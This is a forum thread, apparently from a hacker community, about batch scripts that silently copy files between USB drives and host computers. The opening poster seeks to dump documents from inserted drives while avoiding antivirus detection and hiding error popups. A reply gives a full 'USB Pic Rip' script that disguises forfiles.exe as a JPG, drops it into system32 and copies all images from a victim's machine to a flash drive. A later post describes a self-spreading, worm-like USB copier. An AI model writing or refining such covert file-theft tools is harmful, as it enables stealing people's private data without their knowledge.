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copying entire drives


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I am currently trying to automate the "backing up" of usb drives.

I don't want to use the usb dumper, because it is detected by av.

So, I am trying to do it via a batch file.

When I run this command however,

xcopy "D:*.doc" "c:files" /s/c/q/r/h

it always prompts me whether I want to copy files or directories.

Is there a way to make it automatically copy all documents from drive D *without* prompting?


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you probably want to make the paths relative (as far as possible).

You see, I'm trying to make a usb dumper batch file which is always looping in the backround. So I can't make them very relative.

This works:

xcopy "A:*.doc" "C:folder" /s/c/q/r/h >null

Only, I get popup error messages when a drive does not exist. Is there a way [registry, etc] of disabling/masking these error messages safely?


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Your better off using VBS, it's will work better for what you are trying to accomplish and it's quite easy to learn the basics which is all you will need. To the best of my knowledge there is no simple solution for doing this in batch.

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  • 2 weeks later...

:: USB Pic Rip v2.0.1
:: Scans computer for images.
:: Images are then transfered
:: to connected Flash drive.
:: ~AaoN~ Monday, September 3rd, 2007
:: Revised Tuesday, September 4th, 2007


:: Gives program title.
title USB Pic Rip v2.0.1

::Set your flash drive
SET fla=%cd:~0,2%

::Set File type to Rip. To use uncomment next line and comment the preceding
:SET /p file=filetype:
set file=jpg

:: Checking to see if Rip directory exists
if exist rip goto next
md rip

:: Copy tools to one location for future use.
copy far.jpg c:

::For archive on uncomment lext line.
:copy uharc.exe c:

:: Change Directory to C:
cd c:

:: Creates Readme.txt for display at end of rip
cd c:Documents and Settings%username%
echo. > Readme.txt
echo. USB Pic Rip v2.0.1 >> Readme.txt
echo. By: Aaon >> Readme.txt
echo. Special recognition to: >> Readme.txt
echo. Gonzor for his clean way of setting your flash drive. >> Readme.txt
echo. VaKo and everyone else at hak5.org >> Readme.txt

:: Change directory to search for forfile.exe
cd c:windowssystem32

:: If it does exist goto Scan, if not copy it.
if exist forfiles.exe GOTO SCAN
copy c:far.jpg c:windowssystem32forfiles.exe

:: Create rip directory, Uses forfiles to scan and copy all images to Flash Drive
md %fla%picriprip%computername%
md %fla%picriprip%computername%%file%
FORFILES -pC: -s -m*.%file% -c"CMD /C copy @FILE %fla%picriprip%computername%%file%@FILE"

:: Incase you have the time to archive the files
:cd c:
:md uharc
:copy uharc.exe c:uharc
:cd c:uharc

:: Comment out previous ForFiles command and uncomment following to archive files before transfer
:FORFILES -pC: -s -m*.%file% -c"CMD /C copy @FILE c:uharc@FILE"
:uharc a picrip.uha
:: Copy archive to flash drive
:copy picrip.uha %fla%picriprip%computername%%files%

::Make log of who's been ripped
cd picrip
if exist log.txt goto append
echo. > log.txt
echo. >> log.txt
echo. USB Pic Rip v2.0.1 has sucessfully ripped all .%file%'s on %computername% on %date% at %time% >> log.txt
echo. >> log.txt

::Clean Up
del c:far.jpg
:del c:uharc
cd c:Documents and Settings%username%



This was my code for the picture rip thing i wrote up in batch a while back. It's commented very well so you should be able to go through it and edit it to your liking. You will need to also get the portable uharc if you want it compress it and then the far.jpg is actually forfiles.exe and that can be downloaded here http://www.dynawell.com/reskit/microsoft/w...00/forfiles.zip

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Actually, I've coded something that copies the entire drive or even only specific filetypes from any removable drive.


Just doubleclick it, and it'll ask you.


I've tested the syntax. Doesn't matter if I try

xcopy "D:*.doc" "C:files" /S /C /Q /R /H

or even

xcopy "D:*.doc" "C:files" /S /E /C /Q /R /H /Y

it copies all files to the directory.

Have you created the directory before?

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Actually, I've coded something that copies the entire drive or even only specific filetypes from any removable drive.


Just doubleclick it, and it'll ask you.


I've tested the syntax. Doesn't matter if I try

xcopy "D:*.doc" "C:files" /S /C /Q /R /H

or even

xcopy "D:*.doc" "C:files" /S /E /C /Q /R /H /Y

it copies all files to the directory.

Have you created the directory before?

Obi that is hella fast too. Mind releasing the code. XD?

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  • 8 months later...


I like the USB copier (it´s so easy to use). But do you know how can I make it autostart when Windows start. And If I want to copy my pen drive everytime I put it in the computer, what I have to do (I donñt want to click twice everytime I Insert my pen). thank you very much for the app and if you can make this change it will be better

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i got something i made i can try to find it again

it copies all the files and folders from a certain folder on the usb drive to the pc and makes a service that starts a bat files that runs forever on the pc that detects new drives and copies the files and folders you copied from the usb to the pc back to any new drive and so on and so on

its still kinda in my personal beta stage as for i have yet to find a good enough reason to finish it

plus i guess if it fell into the wrong hands it could be used as a worms so i dont even think the hak5 admins will want me to post that code here

idk its up to them

have a admin quote this post and say yes its ok to post or no its not and i will do as they say

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